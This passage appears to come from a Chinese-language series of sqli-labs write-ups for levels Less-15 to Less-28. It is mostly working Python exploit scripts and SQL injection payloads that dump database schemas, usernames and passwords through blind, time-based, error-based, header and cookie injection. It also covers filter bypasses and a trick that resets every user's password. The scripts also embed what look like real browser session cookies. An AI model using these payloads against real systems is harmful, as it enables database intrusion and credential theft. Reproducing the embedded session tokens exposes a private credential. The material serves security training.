def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in `TNames` character by
    character and dump each column via GuessDatas() once named.
    Results are only printed; returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}
                    r = post("http://localhost/sqllab/Less-15/",data=payload)
                    html = r.text
                    if 'flag.jpg' in html:
                        name += chr(n)
                        print ' [-]', name
                        break

            # `data` is unused; GuessDatas() prints its own result.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Row count of `dname`.`tname` measured as count(`cname`), linear
    search from 0 with the flag.jpg oracle.
    """
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
        # NOTE(review): this URL carries a stray "?id=" that the sibling
        # functions do not; presumably a copy-paste leftover, harmless
        # since only the POST body is used.
        r = post("http://localhost/sqllab/Less-15/?id=",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Length of the value in column `cname` of row `n` (0-based) of
    `dname`.`tname`; first response without flag.jpg means i-1 chars.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Read every value of column `cname` in `dname`.`tname` character by
    character; returns the list of strings (also printed).

    The request sits in a retry loop whose bare `except:` swallows any
    failure (KeyboardInterrupt included under Python 2) and retries
    indefinitely, printing 'Relaxing...'.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-15/",data=payload)
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data


# Driver: schema name -> tables -> columns -> rows. Every probe is a login
# POST that either shows or hides flag.jpg, so from the server's side this
# is hundreds of sequential failed/succeeded logins from one client with a
# changing `uname` -- exactly what login-attempt rate limiting and auth-log
# review are meant to surface.
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day16-Less16

分析

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

1") or 1#

1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=8#
1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),1,1))=115#

代码

from requests import post
from time import *

def GuessDBLength():
    """Length of database(), tested as length(database())=i for
    i = 0, 1, 2, ... through the Less-16 login form.

    Here the delay comes from a UNIONed `sleep(2)` whose WHERE clause is
    the condition under test, so only a true condition stalls the response;
    slower than 1.5 s is the match. The response body is never read.
    Never returns if no i matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        # NOTE(review): time.clock() is deprecated and platform-specific; the
        # check below assumes it advances like a wall clock while the request
        # blocks -- confirm on the interpreter in use.
        s = clock()
        payload = {'uname': '1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=%d#' %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover database() character by character given its `length`.

    Each position tries n = 0..126 in order (7-bit ASCII only); the first
    delayed response fixes chr(n). An unmatched position is skipped, so
    the result may be shorter than `length`. Returns the name.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-16/",data=payload)

            if clock()-s > 1.5:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Number of tables in schema `name`; linear search from 0 using the
    1.5 s timing oracle. Breaks on the match, returns after the loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Length of the name of table number `n` (0-based) in schema `name`.

    ascii(SUBSTR(..., i, 1)) is 0/NULL past the end, so the WHERE fails and
    sleep(2) does not run; the first fast response (< 1.5 s) means i-1
    characters. Inverted test compared with the count probes.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first `num` tables of schema `DBName`
    (length via GuessTBNameLenth(), then a 0..126 scan per position).
    Returns the list of names (also printed).
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}
                r = post("http://localhost/sqllab/Less-16/",data=payload)

                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Count the columns of `tname` in schema `dname`; linear search from 0
    with the 1.5 s timing oracle. Never returns if no i matches.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Length of the name of column `cnum` (0-based) of `tname`; the first
    fast response (< 1.5 s) at position i means i-1 characters exist.
    """
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in `TNames` character by
    character and dump each column via GuessDatas() once named.
    Results are only printed; returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}
                    r = post("http://localhost/sqllab/Less-16/",data=payload)

                    if clock()-s > 1.5:
                        name += chr(n)
                        print ' [-]', name
                        break

            # `data` is unused; GuessDatas() prints its own result.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Row count of `dname`.`tname` measured as count(`cname`), linear
    search from 0 with the timing oracle.
    """
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
        # NOTE(review): stray "?id=" in the URL, unlike the sibling
        # functions; presumably a copy-paste leftover and harmless here.
        r = post("http://localhost/sqllab/Less-16/?id=",data=payload)

        if clock()-s > 1.5:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Length of the value in column `cname` of row `n` (0-based) of
    `dname`.`tname`; first fast response at position i means i-1 chars.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Read every value of column `cname` in `dname`.`tname` character by
    character; returns the list of strings (also printed).

    The request sits in a retry loop whose bare `except:` swallows any
    failure (KeyboardInterrupt included under Python 2) and retries
    indefinitely; `s` is reset per attempt so only the successful one is
    timed.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-16/",data=payload)
                        break
                    except:
                        print 'Relaxing...'

                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data

# Driver: schema name -> tables -> columns -> rows; module-level `s` times
# the whole run (functions above use their own local `s`). Every probe is a
# login POST that stalls ~2 s on a hit, so a run shows up as a long burst of
# slow, sequential login attempts from one client -- the pattern login
# rate limiting and slow-query logging exist to catch.
s = clock()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day17-Less17
### 分析

UPDATE table SET password = '' WHERE username = 'Dhakkan'

基于报错注入:
UPDATE users SET password = ''+(select updatexml(1,concat('',(select from (select username from security.users limit 0,1)x),'',(select from (select password from security.users limit 0,1)x)),1))+'' WHERE username = 'Dhakkan';

(通过子查询,使 select 的表更换一个名称,解决在同一语句中不能先 select 出同一表中的某些值,再 update 这个表的限制)
UPDATE users SET password = ''+(select 1 from (select 1) as a where updatexml(1,concat('*',(select username from security.users as x limit 0,1)),1))+'' WHERE username = 'Dhakkan';
会报错:
即"ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause"

盲注也行:
基于时间
select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c);
select(select if(length(database())=8,sleep(1),'1') From ((select 1 as a) union (select 2 as b)) as c);

或者基于正则

select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c);


UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';
或者
UPDATE users SET password = ''+(select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';

UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From (select 1,2)))+'' WHERE username = 'Dhakkan';

from requests import *
# Single yes/no probe for Less-17: the password field carries a subquery
# whose CASE branch calls sleep(1) only when length(database()) is 8. The
# script does not time the response -- it just prints the page -- so the
# delay is observed by hand. `from requests import *` above is a wildcard
# import; only `post` is used.
pdata = {
    'uname': "Dhakkan",
    'passwd':"'+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'"
}
print post('http://localhost/sqllab/Less-17/', data = pdata).text


## Day18-Less18
### 分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','','')

x'
::1', 'Dhakkan')
('x'',' ::1','')

x' or 1
', '::1', 'Dhakkan')
('x' or 1 ','','')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("useragent","ip","username") VALUES('','::1','Dhakkan');
->
INSERT INTO("useragent","ip","username") VALUES('')#','::1','Dhakkan');

('') or 1#','','')
or 1#', '::1', 'Dhakkan')
INSERT INTO("useragent","ip","username") VALUES('') or 1#','::1','Dhakkan');

INSERT INTO("useragent","ip","username") VALUES('
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '
','::1','Dhakkan');

us 注入:
时间
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '


### 代码
```python
from requests import *

# Less-18: the form fields hold a valid login (the page states this level
# requires a known username/password), and the injected value travels in
# the User-Agent header, which the server inserts into a table unescaped.
# The updatexml() error text, which the page echoes, is the output channel.
# Note for defenders: request headers are input too -- logging and
# validating User-Agent/Referer/Cookie values matters as much as form
# fields. `from requests import *` is a wildcard import; only `post` is used.
pdata = {
    'uname':'Dhakkan',
    'passwd':'dumbo'
}
headers = {
    'User-Agent': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '",
}

print post('http://localhost/sqllab/Less-18/', headers = headers,data=pdata).text

Day19-Less19

分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','')

x'
::1')
('x'',' ::1')

x' or 1
', '::1')
('x' or 1 ','::1')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("referer","ip") VALUES('','::1');
->
INSERT INTO("referer","ip") VALUES('')#','::1');

('') or 1#','','')
or 1#', '::1')
INSERT INTO("referer","ip") VALUES('') or 1#','::1');


INSERT INTO("referer","ip") VALUES('
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '
','::1');


us 注入:
时间
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

# Less-19: identical to Less-18 except the injected value rides in the
# Referer header instead of User-Agent. Header names are case-insensitive
# in HTTP, so the lowercase 'referer' key is sent as the standard header.
pdata = {
    'uname':'Dhakkan',
    'passwd':'dumbo'
}
headers = {
    'referer': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '"
}

print post('http://localhost/sqllab/Less-19/', headers = headers,data=pdata).text

Day20-Less20

分析

select XX,XX from XXXX where username='$cookie' LIMIT 0,1
dhakkan'
'dhakkan'' LIMIT 0,1

select XX,XX from XXXX where username='
' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#
' LIMIT 0,1

比较简单

代码

from requests import *

# Less-20: the `uname` cookie is the injection point; `pdata` is built but
# never sent (the request below is a GET carrying only headers), presumably
# a leftover from the login that originally set the cookie.
# NOTE(review): the rest of the Cookie string looks copied verbatim from the
# author's browser (UM_distinctid/CNZZDATA analytics ids, a Jupyter
# `username-localhost-8888` session token, a PyCharm id). None of it is
# needed by the lab, and publishing a live session cookie is a credential
# leak -- strip unrelated cookies before sharing a script like this.
pdata = {
    'uname':'Dhakkan',
    'passwd':'dumbo'
}
u = "uname=' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#"
headers = {
    'cookie': u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-20/', headers = headers).text

Day21-Less21

分析

b64encode("
troy'
")
->
'troy'') LIMIT 0,1

troy')

') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#

代码

from requests import *
from base64 import *

# Less-21: as Less-20, but the `uname` cookie is base64-encoded before it
# is sent (the server decodes it before use, so encoding is transport, not
# protection). `pdata` is unused -- the request is a header-only GET.
# NOTE(review): the trailing cookies are the author's real browser cookies
# (analytics ids plus a Jupyter session token); they are irrelevant to the
# lab and should be stripped before publishing.
pdata = {
    'uname':'Dhakkan',
    'passwd':'dumbo'
}

u = b64encode("') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
    'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-21/', headers = headers).text

Day22-Less22

分析

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
和 21 一样,只不过单引号改双引号

代码

from requests import *
from base64 import *

# Less-22: same as Less-21 with the cookie value closed by a double quote.
# `pdata` is unused (header-only GET). The trailing cookies are again the
# author's real browser cookies and should not be in a published script.
pdata = {
    'uname':'Dhakkan',
    'passwd':'dumbo'
}

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
    'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-22/', headers = headers).text

Day23-Less23

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'-- -
->
' LIMIT 0,1
select *,* from XX where id = '1'-- -' LIMIT 0,1

''
->
ok
select *,* from XX where id = '''' LIMIT 0,1

1''
->
ok

1#
->
ok

'1' and 0--+
->
1' and 0 ' LIMIT 0,1
select *,* from XX where id = ' '1' and 0--+' LIMIT 0,1

过滤注释,bypass:
select *,* from XX where id = '
' or 1 union select 1,2,'3
' LIMIT 0,1

1' union 1,2,3||'1
select *,* from XX where id = '
1' union 1,2,3||'1
' LIMIT 0,1

利用:
报错:
1' union select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)),2,3||'1

时间:
' or 1 union select (select sleep(1) from (select 1,2)x where length(database())=7),2,'3

代码

from requests import *
import re

# Sweeps every single-byte value (%00..%ff) as a replacement for the spaces
# in `row` and reports which ones the server still accepts as whitespace;
# 'Dumb' in the page (the first user's name) is the success signal.
# NOTE(review): this block sits under the Less-23 heading but requests
# /Less-26/ -- it is the same code as the Less-26 section below; confirm
# which level it was meant for. `re.findall(...)[0]` raises IndexError when
# the response has no "result:" fragment, which aborts the whole sweep.
for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html


Day24-Less24

分析

UPDATE table SET password = '' WHERE username = '' and password = ''
INSERT INTO("username","password") VALUES('2','1');

1') or 1#
1" or 1#

1")#
INSERT INTO("username","password") VALUES('','1');


select (updatexml(1,concat('*',(select username from security.users limit 0,1)),1)) from (select 1,2)x
注册一个用户:
' or 1 or '
密码为 hack
然后修改密码为 hackme,提交后数据库全部的用户密码都为 hackme
UPDATE table SET password = 'hackme' WHERE username = '
' or 1 or '
' and password = ''
比较奇怪的地方是,这样修改的时候,后台貌似能检测到,看了一下源码,有以下判断:
$row = mysql_affected_rows();
if($row==1)
那就能解释这个问题了
但是,即使返回了错误页面,数据库实际上也已经执行了


假如你知道管理员的账号,那么你可以注册一个
admin'#,密码为 troy
然后登陆修改密码
UPDATE table SET password = 'troy' WHERE username = 'admin'#' and password = 'troy'
实现重置管理员密码

用户名密码字段长度限制,没法再深入
' or 1 or '就占用 11 个字符了,只剩 9 个字符可用,database()都有 10 个字符

Day25-Less25

分析



0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)--+
password 中的 or 被过滤成 passwd,报错
Unknown column 'passwd' in 'field list'
改成下面就 ok 了

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

还可以:
0' oorr (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

利用的话
0' union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users--+

Day26-Less25a

分析

数字型
盲注
基于错误:
0 oorr length(database())=7

时间:
1 aandnd (select sleep(1) from (select 1,2,3 )x where length(database())=8)

其他利用
0 union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users

Day27-Less26

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'
->
'1'' LIMIT 0,1
select *,* from XX where id = '1'' LIMIT 0,1

'1'
->
1'' LIMIT 0,1
select *,* from XX where id = ''1'' LIMIT 0,1


select *,* from XX where id = '0' or 1 or '' LIMIT 0,1

基于报错:
0%27%a0oorr%a0length(database())=8%a0oorr%a0%27
1%27%a0aandnd%a0(select%a0(updatexml(1,concat(%27|%27,(select%a0username%a0from%a0security.users%a0limit%a00,1),%27<>%27,(select%a0passwoorrd%a0from%a0security.users%a0limit%a00,1)),1))%a0from%a0(select%a01,2)x)%a0oorr%a0%27

或者
0'%a0union%a0select%a01,2,group_concat(username,'<>',passwoorrd,'<br>')%a0from%a0users%a0where%a0'1


select *,* from XX where id = '0' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '' LIMIT 0,1


代码

from requests import *
import re

# Sweeps every single-byte value (%00..%ff) as a replacement for the spaces
# in `row` and prints the ones the Less-26 filter still lets through as
# whitespace; 'Dumb' in the page is the success signal. This is the same
# code as the block under Day23.
# `re.findall(...)[0]` raises IndexError when the response has no "result:"
# fragment, which aborts the sweep part-way.
for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html

Day28-Less26a

分析

0%27%a0oorr%a01%a0oorr%a0%27

基于错误
0%27%a0oorr%a0length(database())=7%a0oorr%a0%27

这个没报错
1')%a0union%a0select%a01,2,3%a0from%a0users%a0where%a0('1

1') union select 1,2,3 from users where ('1

所以可以利用如下
0%27)%a0union%a0select%a01,2,group_concat(username,%27*%27,passwoorrd,%27%3Cbr%3E%27)%a0from%a0users%a0where%a0(%271

0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1


应该有个判断,如果有错误也不抛异常
比如下面这句是 gg 的
1')  and  (select  (updatexml(1,concat('|',(select   username   from   security.users   limit   0,1),'',(select   password   from   security.users   limit   0,1)),1))  from  (select   1,2)xor  ('0

代码

from requests import *
import re

#for i in range(256):
#row = "0' oorr 1 oorr '"
#row = row.replace(' ','%%%x' %(i))
#html = get("http://localhost/sqllab/Less-26a/?id="+row).text
#print re.findall('result:(.+)</font> ',html)[0]
#if 'Dumb' in html:
#print row
#print html


# Less-26a: error-based payload. Spaces are sent as %a0 and every "or" is
# doubled; note the second replacement also rewrites the "or" inside
# "password". The raw response, the XPATH-marker check and the final
# payload are printed for manual inspection.
payload = "0') or (select (updatexml(1,concat('|',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or ('"
for old, new in ((' ', '%a0'), ('or', 'oorr')):
    payload = payload.replace(old, new)

html = get("http://localhost/sqllab/Less-26a/?id=" + payload).text
print(html)
print('XPATH' in html)
print(payload)
```

## Day29-Less27
### 分析

只过滤了空格以及 union、select, sql 大小写不敏感,随便大写一下就过了,空格用 %a0
或者多嵌套几层
0" uunionnion seseleselectctlect 1,2,group_concat(username,'<>',password,'
') from users where "1
select 貌似过滤了几次,要多嵌套几层

EXEC('se'+'lect'+'* from users;' )

很简单:
0' or (selecT (updatexml(1,concat('|',(selecT username from security.users limit 0,1),'<>',(selecT password from security.users limit 0,1)),1)) from (selecT 1,2)x) or '

当然也有:
0' unioN selecT 1,2,group_concat(username,'<>',password,'
') from users where '1

和前几题一样的


### 代码
```python
from requests import *
import re

#for i in range(256):
#row = "0' or 1 or '"
#row = row.replace(' ','%%%x' %(i))
#html = get("http://localhost/sqllab/Less-27/?id="+row).text
#print re.findall('result:(.+)</font> ',html)[0]
#if 'Dumb' in html:
#print row
#print html


# Less-27: union-based payload with mixed-case keywords, spaces sent as %a0.
# The XPATH check looks like a leftover from the error-based variant: this
# payload has no updatexml() call, so it is expected to print False.
payload = "0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1".replace(' ', '%a0')

html = get("http://localhost/sqllab/Less-27/?id=" + payload).text
print(html)
print('XPATH' in html)
print(payload)
```

## Day30-Less27a
### 分析

对比 27,只是单引号改为双引号,而且不显示具体错误,其他一样的
既然屏蔽错误显示,报错注入当然也就不能用了


### 代码
```python
from requests import *
import re

# Less-27a: the Less-27 payload with the quote character switched to ".
# This level hides database errors, so the 'Dumb' marker in the body is the
# only success signal that is printed.
payload = "0\" unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where \"1".replace(' ', '%a0')

html = get("http://localhost/sqllab/Less-27a/?id=" + payload).text
print(html)
print('Dumb' in html)
print(payload)
```

## Day31-Less28
### 分析

加了圆括号,其他没变
0') union select 1,2,group_concat(username,'<>',password,'
') from users where ('1


### 代码
```python
from requests import *
import re

# Less-28: parenthesised single-quote context, spaces sent as %a0.
payload = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1".replace(' ', '%a0')

html = get("http://localhost/sqllab/Less-28/?id=" + payload).text
print(html)
print('Dumb' in html)
print(payload)

Day32-Less28a

分析

连空格都没过滤,emmmmm,比起前几题简单多了,随便就过了

代码

from requests import *
import re

# Less-28a: identical payload to Less-28 (the %a0 substitution is kept even
# though the analysis above says spaces are not filtered on this level).
